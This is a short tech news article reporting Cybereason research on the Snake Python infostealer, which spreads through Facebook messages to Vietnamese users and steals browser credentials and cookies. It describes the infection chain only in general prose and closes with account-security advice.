New research has revealed that threat actors are leveraging Facebook messages to deploy a sophisticated Python-based information stealer known as Snake.
Cyberason researchers have shared details of the attack, indicating that Snake's primary goal is to capture sensitive data and credentials from unsuspecting users.
It appears to be a relatively new campaign, first coming to light on X in August 2023, and showing a bias towards Vietnamese victims.
Facebook information thief targets Vietnamese users
The attack uses seemingly harmless RAR or ZIP files that, once opened, trigger an infection sequence involving two additional downloaders: a batch script and a cmd script. The cmd script is responsible for executing the Snake data steal from an actor-controlled GitLab repository.
Cybereason has identified three distinct variants of the Snake infostealer: the third is an executable assembled by PyInstaller and is targeted at users of the Coc Coc browser, suggesting a specific focus on Vietnamese users.
Once collected, credentials and cookies are shared across numerous platforms, including Discord, GitHub, and Telegram.
The malware also targets Facebook accounts by extracting cookie information, which could indicate the goal of hijacking accounts, potentially for malicious purposes.
The Vietnam connection is further reinforced by the naming conventions of actor-controlled repositories, which supposedly reference the Vietnamese language in the source code.
Cybereason also noted that the malware targets other browsers used globally, including Brave, Chromium, Google Chrome Browser, Microsoft Edge, Mozilla Firefox and Opera Web Browser.
The discovery comes amid increased scrutiny of Facebook for its apparent failure to help account takeover victims.
TechRadar Pro has asked Meta to share information on how users can increase their protection against these types of attacks and whether the company has any plans to prevent future attacks. In the meantime, users can follow best practices to help protect their accounts, including using complex passwords and two-factor authentication (2FA).
